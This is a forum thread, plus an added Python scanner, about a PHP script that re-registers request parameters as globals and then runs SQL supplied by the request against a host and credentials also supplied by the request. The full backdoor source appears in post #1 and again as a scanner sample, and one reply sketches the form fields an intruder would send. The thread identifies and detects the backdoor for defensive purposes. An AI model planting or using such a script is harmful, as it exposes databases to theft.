programmers alert: identify this php code please

  • johannes
    Confirmed User
    • Jul 2003
    • 855

    #1

    tell me what this code is supposed to do:

    <?php

    if (ini_get('register_globals') != '1') {
        /* We'll register the variables as globals: */
        /* every request parameter becomes a plain PHP variable */
        if (!empty($HTTP_POST_VARS))
            extract($HTTP_POST_VARS);

        if (!empty($HTTP_GET_VARS))
            extract($HTTP_GET_VARS);

        if (!empty($HTTP_SERVER_VARS))
            extract($HTTP_SERVER_VARS);
    }

    /* $host, $user, $pass are never set in this file: they come from the request */
    $lnk = mysql_connect($host,$user,$pass);

    echo "<hr>Begin\n";

    if ($query) {
        $testquery = stripslashes($query);
        mysql_select_db($database, $lnk);

        /* the request-supplied SQL is executed as-is */
        $result = mysql_query($testquery) or die("Query failed : " . mysql_error());

        /* result rows are printed tab-separated */
        while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
            foreach ($line as $col_value) {
                echo "$col_value\t";
            }
            echo "\n";
        }
    }

    die ("<hr>End");

    ?>
  • Dragon Curve
    Confirmed User
    • Oct 2002
    • 252

    #2
    It checks firstly if register_globals is set, if not, it programmatically sets it so that query/POST variables are set to normal variables.

    It then connects to the host specified in the parameters and executes the query specified in the parameters and returns the result set from it.

    Ultimately, it's to execute a query on a specified host remotely.

    • teksonline
      So Fucking Banned
      • Jan 2005
      • 2904

      #3
      php coders

      looks like it needs 3 more php coders to remove the redundancy problem the first php coder created

      • V_RocKs
        Damn Right I Kiss Ass!
        • Nov 2003
        • 32449

        #4
        It is basically a backdoor directly into your mysql...

        • Robertf
          Confirmed User
          • Feb 2004
          • 392

          #5
          Delete it!!

          Whatever it's used for ... it's one big backdoor ...

          • quantum-x
            Confirmed User
            • Feb 2002
            • 6863

            #6
            There's a lot of redundant code to pass a query straight to your database.
            Bad, bad, bad.

            • AcidMax
              Confirmed User
              • May 2002
              • 1827

              #7
              As everyone else has said, it looks to see if it registers the variables globally (i.e., takes a query string like ?info=123123 and sets it to $info automatically). If not, the extract function does so, then he is connecting to a db (and could easily pass $user,$pass,$host variables to connect right to your database, same with a $query string, for example:

              He could send a post request with the variables needed..

              <input type="user" value="mysql_username">
              <input type="pass" value="mysql_pass">
              <input type="host" value="mysql_host">
              <input type="query" value="SELECT * FROM your_users_table">

              It would then return all your data in a tab delimited format when he submitted it. It is a HUGE backdoor to your db and to ANY db on your system as long as he has a user/pass for it. For that matter it could access any DB in the world as long as it was allowing your host to connect to the remote DB. It could even be used to hide their tracks if they were a hacker. Throw that on someone else's server and use it to gain access to another person's db so they don't track it down. It's just an all around BAD script.
              Last edited by AcidMax; 04-03-2005, 06:10 AM.
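
              Posts #2 and #7 above describe the two halves of the problem: extract() on the request arrays recreates register_globals, and the variables that the request now controls ($host, $user, $pass, $database, $query) flow straight into the mysql_* calls. The checker below is an added example, not code from the thread or from any project named in it. It is a heuristic static scan written for this post: it looks for extract() of a request array, treats every variable the file never assigns itself as request-controlled (plus anything derived from such a variable), and reports each database call that receives one. The three PHP samples are constructed for the example; the first is the script from post #1.

```python
"""Heuristic audit for the register_globals + pass-through query pattern.

Added example for this thread; constructed samples, not real site files.
"""
import re
from dataclasses import dataclass

# Request arrays, old names (HTTP_*_VARS) and current ones ($_GET etc.).
REQUEST_ARRAYS = (r"(?:HTTP_(?:GET|POST|COOKIE|REQUEST|SERVER)_VARS"
                  r"|_(?:GET|POST|COOKIE|REQUEST|SERVER))")
# extract() on one of them recreates register_globals: each request key becomes a variable.
REGISTERS_GLOBALS = re.compile(r"extract\s*\(\s*\$" + REQUEST_ARRAYS + r"\s*\)")
ASSIGNMENT = re.compile(r"\$(\w+)\s*=(?!=)\s*([^;]+);")
VAR_REF = re.compile(r"\$(\w+)")
# Database calls whose arguments should never come straight from the request.
SINKS = re.compile(
    r"\b(mysql_connect|mysql_pconnect|mysql_select_db|mysql_query|mysql_db_query"
    r"|mysqli_connect|mysqli_query)\s*\(([^)]*)\)"
)


@dataclass
class Finding:
    sink: str            # database function reached
    tainted_args: list   # variables in its argument list that the request controls


def strip_comments(src: str) -> str:
    """Drop /* */ blocks and full-line // or # comments so they add no false $refs."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"(?m)^\s*(?://|#).*$", "", src)


def audit(src: str) -> list:
    """Return one Finding per database call that receives request-controlled variables.

    Model: once the file re-registers request data as globals, a variable the file
    never assigns is attacker-supplied, and an assignment whose right-hand side
    mentions such a variable is attacker-influenced as well.
    """
    src = strip_comments(src)
    if not REGISTERS_GLOBALS.search(src):
        return []            # without registration an unset variable is just NULL
    safe = set()             # variables built only from literals and other safe variables
    for name, rhs in ASSIGNMENT.findall(src):
        if set(VAR_REF.findall(rhs)) <= safe:
            safe.add(name)
        else:
            safe.discard(name)
    findings = []
    for sink, args in SINKS.findall(src):
        tainted = [v for v in VAR_REF.findall(args) if v not in safe]
        if tainted:
            findings.append(Finding(sink, tainted))
    return findings


# Sample 1 (constructed from the script in post #1): credentials and SQL from the request.
SUSPECT = r"""<?php
if (ini_get('register_globals') != '1') {
    /* We'll register the variables as globals: */
    if (!empty($HTTP_POST_VARS)) extract($HTTP_POST_VARS);
    if (!empty($HTTP_GET_VARS)) extract($HTTP_GET_VARS);
}
$lnk = mysql_connect($host,$user,$pass);
if ($query) {
    $testquery = stripslashes($query);
    mysql_select_db($database, $lnk);
    $result = mysql_query($testquery) or die("Query failed : " . mysql_error());
    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { echo "$col_value\t"; }
}
?>"""

# Sample 2 (constructed): still does extract(), but credentials and SQL are literals.
CONST_CREDS = r"""<?php
extract($_POST);
$host = 'localhost'; $user = 'app'; $pass = 'placeholder'; $database = 'shop';
$lnk = mysql_connect($host, $user, $pass);
mysql_select_db($database, $lnk);
$result = mysql_query("SELECT id, name FROM products");
?>"""

# Sample 3 (constructed): no global registration at all.
BENIGN = r"""<?php
$lnk = mysql_connect($host, $user, $pass);
$result = mysql_query("SELECT id FROM products");
?>"""


if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT), ("constant creds", CONST_CREDS), ("benign", BENIGN)):
        found = audit(sample)
        print(f"{label}: {len(found)} finding(s)")
        for f in found:
            print(f"  {f.sink}() receives request-controlled ${', $'.join(f.tainted_args)}")
```

              Run over a web root this flags the post #1 script three times (connect, select_db, query) and stays quiet on the other two samples, which is the point: extract() of request data is the enabler, but what makes this file a backdoor is that the connection target, the credentials and the SQL text are all request-controlled. Sample 2 still deserves a cleanup for using extract() on $_POST, but it is not a remote query console.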

              • SMG
                Confirmed User
                • Aug 2003
                • 1798

                #8
                somebody wants to hump your site hehehe

                • arnette
                  Confirmed User
                  • Feb 2005
                  • 283

                  #9
                  yep, a backdoor for sure, too bad it wouldn't display the info properly though

                  • Tom_PM
                    Porn Meister
                    • Feb 2005
                    • 16443

                    #10
                    I prefer flat files.

                    • Barefootsies
                      Choice is an Illusion
                      • Feb 2005
                      • 42635

                      #11
                      Originally posted by arnette
                      yep, a backdoor for sure, too bad it wouldn't display the info properly though
                      More or less.

                      • JSA Matt
                        So Fucking Banned
                        • Aug 2003
                        • 5464

                        #12
                        Very stupid code, I would delete it from whatever script you found it in

                        • Alex From San Diego
                          Confirmed User
                          • May 2001
                          • 1642

                          #13
                          Before you delete it, where did you find that code?

                          • Jace
                            FBOP Class Of 2013
                            • Jan 2004
                            • 35562

                            #14
                            looks like code from an old version of oscommerce before they did away with that register globals shit
